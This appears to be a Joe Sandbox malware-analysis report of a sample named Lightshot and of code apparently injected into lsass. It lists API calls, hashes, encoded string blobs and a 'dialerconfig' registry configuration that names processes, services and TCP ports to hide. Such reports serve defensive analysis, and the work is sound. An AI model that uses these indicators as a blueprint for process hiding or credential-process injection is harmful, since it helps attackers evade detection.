                                                                          • JTYTcnV1a2NsdGl6Ym54d2J2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0E3lvYwAe0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDUGNvODxrdA//aGO/a+sVdHVrY2h0aXqSblp3aXRtYW0mY29oZ2t0a3lvYyh9a3J0ZWtjaHRpOmNueHdiZmNhbXZjb255a3RreW9jbmxr, xrefs: 00007FF7B1C86793
                                                                          • 6, xrefs: 00007FF7B1C86A3B
                                                                          • 0, xrefs: 00007FF7B1C86F39
                                                                          • JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0Q3hvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NVHJArDWT+aRFl/HAbf+19UB/1ah1l9mVaEPt/w2j6aVoF+nkbZP5pBBoBcB9/7X0OGPJqB2X2ZQQX+397aPppBAL9, xrefs: 00007FF7B1C86F9E
                                                                          • JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0i3lvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NdVgWOBS5rzBkvadUTNXjYEy1izhAvY8A+5BDbHyJvzD7xFt0ELmvMPukE1RA1eNg06xLOHS9jwD7kF9sbIm/MPvET, xrefs: 00007FF7B1C86A65
                                                                          • X&, xrefs: 00007FF7B1C86FAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen
                                                                          • String ID: 0$JTYTcnV1a2NsdGl6Ym54d2J2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0E3lvYwAe0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDUGNvODxrdA//aGO/a+sVdHVrY2h0aXqSblp3aXRtYW0mY29oZ2t0a3lvYyh9a3J0ZWtjaHRpOmNueHdiZmNhbXZjb255a3RreW9jbmxr$JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0Q3hvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NVHJArDWT+aRFl/HAbf+19UB/1ah1l9mVaEPt/w2j6aVoF+nkbZP5pBBoBcB9/7X0OGPJqB2X2ZQQX+397aPppBAL9$JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0i3lvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NdVgWOBS5rzBkvadUTNXjYEy1izhAvY8A+5BDbHyJvzD7xFt0ELmvMPukE1RA1eNg06xLOHS9jwD7kF9sbIm/MPvET$X&$ 6
                                                                          • API String ID: 4088430540-3141501615
                                                                          • Opcode ID: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                          • Instruction ID: d9da619ba95e6320c848a902134fbc7de77a4d1117bb57215101d81e7252d4cd
                                                                          • Opcode Fuzzy Hash: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                          • Instruction Fuzzy Hash: 4E528321D2DB8288F711AF2DA8497F4E350AFB338DF944235DB8C569A9DFAC6145C324

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                                          • String ID: Hc=v+$&
                                                                          • API String ID: 3825114775-1582277970
                                                                          • Opcode ID: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                          • Instruction ID: 680508bad1af1f73dde6bdbc8d0e1d703faa2fb5da1cee5c6160ddcbe0b365bf
                                                                          • Opcode Fuzzy Hash: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                          • Instruction Fuzzy Hash: 15411D7191960288E700BB1DE59C379A391AF66B9DFA45031CB4E43BAEDFECA441C331

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                                                          • String ID: 0$X$`
                                                                          • API String ID: 597572034-2527496196
                                                                          • Opcode ID: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                          • Instruction ID: aeb3a7da64d14ea25d19d8616db3b5d1b3000977be212d482ad6fb5b0b697ddc
                                                                          • Opcode Fuzzy Hash: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                          • Instruction Fuzzy Hash: BB02C222908BC185E3209F19E4487BAB7A0FBA6798F904235DB9C07BE9DFBCD145C750

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: wcscatwcscpywcslen
                                                                          • String ID: $0$0$@$@
                                                                          • API String ID: 3623275624-1413854666
                                                                          • Opcode ID: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                          • Instruction ID: 48e69d432e52367dc9ddbdde24ab75bc0823163e869c638d24dca096c3c638c1
                                                                          • Opcode Fuzzy Hash: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                          • Instruction Fuzzy Hash: 59B1B12180C6C185E321AB1CE4497FAB7A0FFA234CF905135EB8D56AA9DFBCD145CB60

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF7B1C8C8F4,00007FF7B1C8C8F4,?,?,00007FF7B1C80000,?,00007FF7B1C81991), ref: 00007FF7B1C81C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF7B1C8C8F4,00007FF7B1C8C8F4,?,?,00007FF7B1C80000,?,00007FF7B1C81991), ref: 00007FF7B1C81CC7
                                                                          • memcpy.MSVCRT ref: 00007FF7B1C81CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,00007FF7B1C8C8F4,00007FF7B1C8C8F4,?,?,00007FF7B1C80000,?,00007FF7B1C81991), ref: 00007FF7B1C81D23
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                          • Instruction ID: 7485e01ffd752addd7a8cbb5f1879832beba28d41fe2b46b2094344248b4ca42
                                                                          • Opcode Fuzzy Hash: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                          • Instruction Fuzzy Hash: 9C41B771A0854289EB11AB19D48C7B9A790EB67B89FA44132CF0D43BA9DE7CE445C321

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 926137887-0
                                                                          • Opcode ID: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                          • Instruction ID: fdcef9700e00b62deca65141e8d89cbc6b3fcccbce39132006215d6356cb8686
                                                                          • Opcode Fuzzy Hash: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                          • Instruction Fuzzy Hash: 1621F124A1950285FB15BB59E58C375D2607F23B99FE40131CF0D47AACCFACA846C360

                                                                          Control-flow Graph

                                                                          Control-flow graph (rendered graph not preserved; only the block range and called routines are recoverable): basic blocks 7ff7b1c81e10 to 7ff7b1c81f69; library call signal (three call sites); internal call 7ff7b1c89ff0
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                          • Instruction ID: 5e10815bddc534762b21a854ac22026a488710e5610a08ab19adf349fc03ea7b
                                                                          • Opcode Fuzzy Hash: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                          • Instruction Fuzzy Hash: 90218D31E0910689FB64621C95CC37D91C19FBA76CFB99135DB0E43ADCCEACACC28261

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen
                                                                          • String ID: 0$@
                                                                          • API String ID: 4088430540-1545510068
                                                                          • Opcode ID: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                          • Instruction ID: 1aa0f3e51e3d73ab1fb34f30c3b1c63b7db4aed84da8662bf8c02f611b20a812
                                                                          • Opcode Fuzzy Hash: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                          • Instruction Fuzzy Hash: E3114D2252868186E3509B18F4897AAA3B4EFE5394F545124F78982A68EF7DC145CB10

                                                                          Control-flow Graph

                                                                          Control-flow graph (rendered graph not preserved; only the block range and called routines are recoverable): basic blocks 7ff7b1c81880 to 7ff7b1c81b98; library call VirtualProtect; internal calls 7ff7b1c82420, 7ff7b1c82660, 7ff7b1c81ba0, 7ff7b1c81d40
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1C81247), ref: 00007FF7B1C819F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                          • Instruction ID: 1cc0ef22fa027c90a0ca83711941225010775bf4185f6db7a66db1bf1e558592
                                                                          • Opcode Fuzzy Hash: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                          • Instruction Fuzzy Hash: D3517821F04546DAEB10AB29D48D7B8A7A1BB26B5DFA45131DB1C07B9DCFBCE482C710

                                                                          Control-flow Graph

                                                                          Control-flow graph (rendered graph not preserved; only the block range and called routines are recoverable): basic blocks 7ff7b1c81800 to 7ff7b1c81867; library call fprintf; internal call 7ff7b1c82290
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                          • Instruction ID: 11f6652f01d30d499a880f04845b0d96a5f2ff385f29a261dcb8f511d237959d
                                                                          • Opcode Fuzzy Hash: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                          • Instruction Fuzzy Hash: 46F0C811E1894582E310BB6CA98D1BDE360EB6A3D8FA09235DF4D57959DF5CF141C310

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                          • Instruction ID: ad6039847d7e89e39794c717edf85846451554120a9972110ce70758abdbfdca
                                                                          • Opcode Fuzzy Hash: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                          • Instruction Fuzzy Hash: 6E01D229A0950286F715AB5DBD8C17492607F26B99FE40131CF0D53E9CDFACA955C220

                                                                          Execution Graph

                                                                          Execution Coverage: 1.1%
                                                                          Dynamic/Decrypted Code Coverage: 0%
                                                                          Signature Coverage: 0%
                                                                          Total number of Nodes: 132
                                                                          Total number of Limit Nodes: 13

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: S$dialer
                                                                          • API String ID: 756756679-3873981283
                                                                          • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                          • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                                          • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                          • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                                            • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                                          • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                                          • SleepEx.KERNELBASE ref: 00000140AE861ADD
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
